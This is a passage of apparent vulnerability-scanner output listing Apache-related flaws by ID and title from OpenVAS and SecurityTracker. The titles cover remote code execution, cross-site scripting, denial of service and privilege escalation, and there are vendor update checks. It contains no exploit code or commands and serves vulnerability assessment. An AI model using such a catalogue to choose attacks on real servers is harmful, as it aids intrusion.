15649| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
15650| [9] Apache HTTP Server 2.x Memory Leak Exploit
15651|
15652| OpenVAS (Nessus) - http://www.openvas.org:
15653| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
15654| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
15655| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
15656| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
15657| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
15658| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
15659| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
15660| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
15661| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
15662| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
15663| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
15664| [900571] Apache APR-Utils Version Detection
15665| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
15666| [900496] Apache Tiles Multiple XSS Vulnerability
15667| [900493] Apache Tiles Version Detection
15668| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
15669| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
15670| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
15671| [870175] RedHat Update for apache RHSA-2008:0004-01
15672| [864591] Fedora Update for apache-poi FEDORA-2012-10835
15673| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
15674| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
15675| [864250] Fedora Update for apache-poi FEDORA-2012-7683
15676| [864249] Fedora Update for apache-poi FEDORA-2012-7686
15677| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
15678| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
15679| [855821] Solaris Update for Apache 1.3 122912-19
15680| [855812] Solaris Update for Apache 1.3 122911-19
15681| [855737] Solaris Update for Apache 1.3 122911-17
15682| [855731] Solaris Update for Apache 1.3 122912-17
15683| [855695] Solaris Update for Apache 1.3 122911-16
15684| [855645] Solaris Update for Apache 1.3 122912-16
15685| [855587] Solaris Update for kernel update and Apache 108529-29
15686| [855566] Solaris Update for Apache 116973-07
15687| [855531] Solaris Update for Apache 116974-07
15688| [855524] Solaris Update for Apache 2 120544-14
15689| [855494] Solaris Update for Apache 1.3 122911-15
15690| [855478] Solaris Update for Apache Security 114145-11
15691| [855472] Solaris Update for Apache Security 113146-12
15692| [855179] Solaris Update for Apache 1.3 122912-15
15693| [855147] Solaris Update for kernel update and Apache 108528-29
15694| [855077] Solaris Update for Apache 2 120543-14
15695| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
15696| [850088] SuSE Update for apache2 SUSE-SA:2007:061
15697| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
15698| [841209] Ubuntu Update for apache2 USN-1627-1
15699| [840900] Ubuntu Update for apache2 USN-1368-1
15700| [840798] Ubuntu Update for apache2 USN-1259-1
15701| [840734] Ubuntu Update for apache2 USN-1199-1
15702| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
15703| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
15704| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
15705| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
15706| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
15707| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
15708| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
15709| [835253] HP-UX Update for Apache Web Server HPSBUX02645
15710| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
15711| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
15712| [835236] HP-UX Update for Apache with PHP HPSBUX02543
15713| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
15714| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
15715| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
15716| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
15717| [835188] HP-UX Update for Apache HPSBUX02308
15718| [835181] HP-UX Update for Apache With PHP HPSBUX02332
15719| [835180] HP-UX Update for Apache with PHP HPSBUX02342
15720| [835172] HP-UX Update for Apache HPSBUX02365
15721| [835168] HP-UX Update for Apache HPSBUX02313
15722| [835148] HP-UX Update for Apache HPSBUX01064
15723| [835139] HP-UX Update for Apache with PHP HPSBUX01090
15724| [835131] HP-UX Update for Apache HPSBUX00256
15725| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
15726| [835104] HP-UX Update for Apache HPSBUX00224
15727| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
15728| [835101] HP-UX Update for Apache HPSBUX01232
15729| [835080] HP-UX Update for Apache HPSBUX02273
15730| [835078] HP-UX Update for ApacheStrong HPSBUX00255
15731| [835044] HP-UX Update for Apache HPSBUX01019
15732| [835040] HP-UX Update for Apache PHP HPSBUX00207
15733| [835025] HP-UX Update for Apache HPSBUX00197
15734| [835023] HP-UX Update for Apache HPSBUX01022
15735| [835022] HP-UX Update for Apache HPSBUX02292
15736| [835005] HP-UX Update for Apache HPSBUX02262
15737| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
15738| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
15739| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
15740| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
15741| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
15742| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
15743| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
15744| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
15745| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
15746| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
15747| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
15748| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
15749| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
15750| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
15751| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
15752| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
15753| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
15754| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
15755| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
15756| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
15757| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
15758| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
15759| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
15760| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
15761| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
15762| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
15763| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
15764| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
15765| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
15766| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
15767| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
15768| [801942] Apache Archiva Multiple Vulnerabilities
15769| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
15770| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
15771| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
15772| [801284] Apache Derby Information Disclosure Vulnerability
15773| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
15774| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
15775| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
15776| [800680] Apache APR Version Detection
15777| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
15778| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
15779| [800677] Apache Roller Version Detection
15780| [800279] Apache mod_jk Module Version Detection
15781| [800278] Apache Struts Cross Site Scripting Vulnerability
15782| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
15783| [800276] Apache Struts Version Detection
15784| [800271] Apache Struts Directory Traversal Vulnerability
15785| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
15786| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
15787| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
15788| [103122] Apache Web Server ETag Header Information Disclosure Weakness
15789| [103074] Apache Continuum Cross Site Scripting Vulnerability
15790| [103073] Apache Continuum Detection
15791| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
15792| [101023] Apache Open For Business Weak Password security check
15793| [101020] Apache Open For Business HTML injection vulnerability
15794| [101019] Apache Open For Business service detection
15795| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
15796| [100923] Apache Archiva Detection
15797| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
15798| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
15799| [100813] Apache Axis2 Detection
15800| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
15801| [100795] Apache Derby Detection
15802| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
15803| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
15804| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
15805| [100514] Apache Multiple Security Vulnerabilities
15806| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
15807| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
15808| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
15809| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15810| [72626] Debian Security Advisory DSA 2579-1 (apache2)
15811| [72612] FreeBSD Ports: apache22
15812| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
15813| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
15814| [71512] FreeBSD Ports: apache
15815| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
15816| [71256] Debian Security Advisory DSA 2452-1 (apache2)
15817| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
15818| [70737] FreeBSD Ports: apache
15819| [70724] Debian Security Advisory DSA 2405-1 (apache2)
15820| [70600] FreeBSD Ports: apache
15821| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
15822| [70235] Debian Security Advisory DSA 2298-2 (apache2)
15823| [70233] Debian Security Advisory DSA 2298-1 (apache2)
15824| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
15825| [69338] Debian Security Advisory DSA 2202-1 (apache2)
15826| [67868] FreeBSD Ports: apache
15827| [66816] FreeBSD Ports: apache
15828| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
15829| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
15830| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
15831| [66081] SLES11: Security update for Apache 2
15832| [66074] SLES10: Security update for Apache 2
15833| [66070] SLES9: Security update for Apache 2
15834| [65998] SLES10: Security update for apache2-mod_python
15835| [65893] SLES10: Security update for Apache 2
15836| [65888] SLES10: Security update for Apache 2
15837| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
15838| [65510] SLES9: Security update for Apache 2
15839| [65472] SLES9: Security update for Apache
15840| [65467] SLES9: Security update for Apache
15841| [65450] SLES9: Security update for apache2
15842| [65390] SLES9: Security update for Apache2
15843| [65363] SLES9: Security update for Apache2
15844| [65309] SLES9: Security update for Apache and mod_ssl
15845| [65296] SLES9: Security update for webdav apache module
15846| [65283] SLES9: Security update for Apache2
15847| [65249] SLES9: Security update for Apache 2
15848| [65230] SLES9: Security update for Apache 2
15849| [65228] SLES9: Security update for Apache 2
15850| [65212] SLES9: Security update for apache2-mod_python
15851| [65209] SLES9: Security update for apache2-worker
15852| [65207] SLES9: Security update for Apache 2
15853| [65168] SLES9: Security update for apache2-mod_python
15854| [65142] SLES9: Security update for Apache2
15855| [65136] SLES9: Security update for Apache 2
15856| [65132] SLES9: Security update for apache
15857| [65131] SLES9: Security update for Apache 2 oes/CORE
15858| [65113] SLES9: Security update for apache2
15859| [65072] SLES9: Security update for apache and mod_ssl
15860| [65017] SLES9: Security update for Apache 2
15861| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
15862| [64783] FreeBSD Ports: apache
15863| [64774] Ubuntu USN-802-2 (apache2)
15864| [64653] Ubuntu USN-813-2 (apache2)
15865| [64559] Debian Security Advisory DSA 1834-2 (apache2)
15866| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
15867| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
15868| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
15869| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
15870| [64443] Ubuntu USN-802-1 (apache2)
15871| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
15872| [64423] Debian Security Advisory DSA 1834-1 (apache2)
15873| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
15874| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
15875| [64251] Debian Security Advisory DSA 1816-1 (apache2)
15876| [64201] Ubuntu USN-787-1 (apache2)
15877| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
15878| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
15879| [63565] FreeBSD Ports: apache
15880| [63562] Ubuntu USN-731-1 (apache2)
15881| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
15882| [61185] FreeBSD Ports: apache
15883| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
15884| [60387] Slackware Advisory SSA:2008-045-02 apache
15885| [58826] FreeBSD Ports: apache-tomcat
15886| [58825] FreeBSD Ports: apache-tomcat
15887| [58804] FreeBSD Ports: apache
15888| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
15889| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
15890| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
15891| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
15892| [57335] Debian Security Advisory DSA 1167-1 (apache)
15893| [57201] Debian Security Advisory DSA 1131-1 (apache)
15894| [57200] Debian Security Advisory DSA 1132-1 (apache2)
15895| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
15896| [57145] FreeBSD Ports: apache
15897| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
15898| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
15899| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
15900| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
15901| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
15902| [56067] FreeBSD Ports: apache
15903| [55803] Slackware Advisory SSA:2005-310-04 apache
15904| [55519] Debian Security Advisory DSA 839-1 (apachetop)
15905| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
15906| [55355] FreeBSD Ports: apache
15907| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
15908| [55261] Debian Security Advisory DSA 805-1 (apache2)
15909| [55259] Debian Security Advisory DSA 803-1 (apache)
15910| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
15911| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
15912| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
15913| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
15914| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
15915| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
15916| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
15917| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
15918| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
15919| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
15920| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
15921| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
15922| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
15923| [54439] FreeBSD Ports: apache
15924| [53931] Slackware Advisory SSA:2004-133-01 apache
15925| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
15926| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
15927| [53878] Slackware Advisory SSA:2003-308-01 apache security update
15928| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
| [53848] Debian Security Advisory DSA 131-1 (apache)
| [53784] Debian Security Advisory DSA 021-1 (apache)
| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
| [53735] Debian Security Advisory DSA 187-1 (apache)
| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
| [53282] Debian Security Advisory DSA 594-1 (apache)
| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
| [53215] Debian Security Advisory DSA 525-1 (apache)
| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
| [52529] FreeBSD Ports: apache+ssl
| [52501] FreeBSD Ports: apache
| [52461] FreeBSD Ports: apache
| [52390] FreeBSD Ports: apache
| [52389] FreeBSD Ports: apache
| [52388] FreeBSD Ports: apache
| [52383] FreeBSD Ports: apache
| [52339] FreeBSD Ports: apache+mod_ssl
| [52331] FreeBSD Ports: apache
| [52329] FreeBSD Ports: ru-apache+mod_ssl
| [52314] FreeBSD Ports: apache
| [52310] FreeBSD Ports: apache
| [15588] Detect Apache HTTPS
| [15555] Apache mod_proxy content-length buffer overflow
| [15554] Apache mod_include priviledge escalation
| [14771] Apache <= 1.3.33 htpasswd local overflow
| [14177] Apache mod_access rule bypass
| [13644] Apache mod_rootme Backdoor
| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
| [12280] Apache Connection Blocking Denial of Service
| [12239] Apache Error Log Escape Sequence Injection
| [12123] Apache Tomcat source.jsp malformed request information disclosure
| [12085] Apache Tomcat servlet/JSP container default files
| [11438] Apache Tomcat Directory Listing and File disclosure
| [11204] Apache Tomcat Default Accounts
| [11092] Apache 2.0.39 Win32 directory traversal
| [11046] Apache Tomcat TroubleShooter Servlet Installed
| [11042] Apache Tomcat DOS Device Name XSS
| [11041] Apache Tomcat /servlet Cross Site Scripting
| [10938] Apache Remote Command Execution via .bat files
| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
| [10773] MacOS X Finder reveals contents of Apache Web files
| [10766] Apache UserDir Sensitive Information Disclosure
| [10756] MacOS X Finder reveals contents of Apache Web directories
| [10752] Apache Auth Module SQL Insertion Attack
| [10704] Apache Directory Listing
| [10678] Apache /server-info accessible
| [10677] Apache /server-status accessible
| [10440] Check for Apache Multiple / vulnerability
|
| SecurityTracker - https://www.securitytracker.com:
| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
| [1024096] Apache mod_proxy_http May Return Results for a Different Request
| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
